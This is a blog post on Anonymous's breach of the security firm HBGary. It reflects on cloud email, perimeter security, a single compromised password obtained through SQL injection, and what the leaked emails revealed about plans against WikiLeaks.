Anonymous versus HBGary

I don't think the HBGary story has had the amount of attention it deserves from the mainstream.

It's worth reading just as drama: Security researcher takes on the "Anonymous" hacker group, and loses so spectacularly it almost defies description.

It's important for what it says about any organisation's IT choices and their security implications. HBGary used Google Apps. Cloud services are enormously convenient, particularly for an organisation that does not really have a physical "home", but using them means losing perimiter security altogether.

Perimiter security has a bad name, because in the old days it was all there was, and today it is not enough. But the things that are possible even if you try to protect your perimiter are much easier if you don't even have one.

A basic IT risk assessment question for anybody is, "how much damage can an attacker do with one password?". With one password, Anonymous downloaded all of HBGary's corporate email from Google and posted it on the internet. They did more than that — the highlight for security commentators was the social-engineering attack on via a Nokia engineer — but the email was enough by itself, as well as enabling the other attacks. They got the email admin password from an ad-hoc CMS with a SQL-injection vulnerability, as it happens, but if your whole company can be destroyed with one password then you're doing it wrong. (Damn, it's so hard to avoid lapsing into dialect on this story).

And the third interesting angle is what is to be found in the data Anonymous posted. The company was proposing to feed fake data to WikiLeaks to discredit it, and to pressure journalists who defended WikiLeaks. There is chatter about government involvement in this, but I haven't seen that actually substantiated. It may be in there somewhere. The HBGary Federal projects aimed at government clients seem to be standard network monitoring / intrusion detection stuff.

In case anyone gets confused, I'm not here to defend Anonymous, or for that matter to attack them. They exist. If they get caught they'll get the book thrown at them, which is understandable, but I'm more interested in what the world looks like with them in it. Whereas Assange attempts to define his aims, and appeals for support, Anonymous claim only to be "in it for the lulz", which is not open to disputation.

Update: Intriguing piece on HBGary government work on rootkits and penetration tools. In principle this should be verifiable from the email dumps, but I haven't checked.

Labels: ,